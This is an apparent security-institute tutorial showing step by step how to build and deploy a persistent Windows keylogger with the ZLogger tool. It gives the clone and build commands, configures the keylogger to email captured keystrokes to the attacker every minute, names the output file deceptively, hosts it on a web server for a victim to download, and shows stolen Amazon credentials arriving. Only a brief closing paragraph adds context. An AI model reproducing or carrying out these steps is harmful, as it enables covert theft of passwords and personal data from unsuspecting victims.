White Hat Institute

Make a keylogger using the ZLogger tool

Keyloggers are a form of monitoring software that records a user’s keystrokes. These keystroke loggers, one of the oldest types of cyber attack, record the information you type into a website or application and send it to a third party.

ZLogger is one of the python-based keyloggers written by a security professional, Zaid Al-Quraishi. The main feature of this tool is to create a persistent keylogger for Windows and Linux operating systems. This tool does not require admin privileges, and it starts with a system startup. It captures every key strobe and sends a report via email to an attacker.

To download ZLogger, visit the following page https://github.com/z00z/ZLogger and copy the downloadable link.

keylogger 21

Open your terminal and download the tool using the “git clone” command.

Ex: ([email protected]:/opt# git clone https://github.com/z00z/ZLogger.git).

Next, change your directory to “ZLogger” and list the contents.

keylogger 22

To run the program, we need to use the “python” command, and to specify some options first, we need to list all available options with the “ – – help” operator.

Ex : ([email protected]:/opt/ZLogger# python zlogger.py  – – help).

keylogger 23

Now let’s create a keylogger and see it in action. In this example, we’ll be targeting the windows based operating system using the “-w” option with the interval “-i” of 60 seconds. So every minute, our keylogger will send a report. Next, we need to provide our email address using the “-e” option and a password “-p” of the email account. We need to provide this information, so the keylogger knows where to send the captured data. Lastly, we output our keylogger file using the “-o” option.

Ex: ([email protected]:/opt/ZLogger# python zlogger.py -i 60 -w -e [email protected] -p johndoesecurity -o please_click_me_I_am_not_a_keylogger).

keylogger 24

Once the keylogger completes the process, it will be saved in the “ZLogger/dist/” directory as a “please_click_me_I_am_not_a_keylogger” fileBefore executing this file on the target computer, don’t forget to allow less secure applications in your Gmail account. Use the following link to do so https://myaccount.google.com/lesssecureapps.”

keylogger 25

Next, copy the file to our web server so it can be reached and downloaded easily from the target computer.

Ex: ([email protected]:/opt/ZLogger/dist# cp please_click_me_I_am_not_a_keylogger.exe /var/www/html/Evil-Files/).

Now let’s download it to our victim PC and see it in action.

keylogger 26

Once our victim runs the executable and tries to type or browse something, our keylogger will capture and send them to our email address.

keylogger 27

As it is shown in the image below, we were managed to receive a report from ZLogger with a captured username and password from Amazon.

keylogger 28

Keyloggers are used by criminals to steal personal or financial information, such as banking information, which they then sell or use for profit. They do, however, have legitimate uses in the workplace, such as troubleshooting, improving user experience, and monitoring employees. Keylogging is also used for monitoring by law enforcement and intelligence agencies.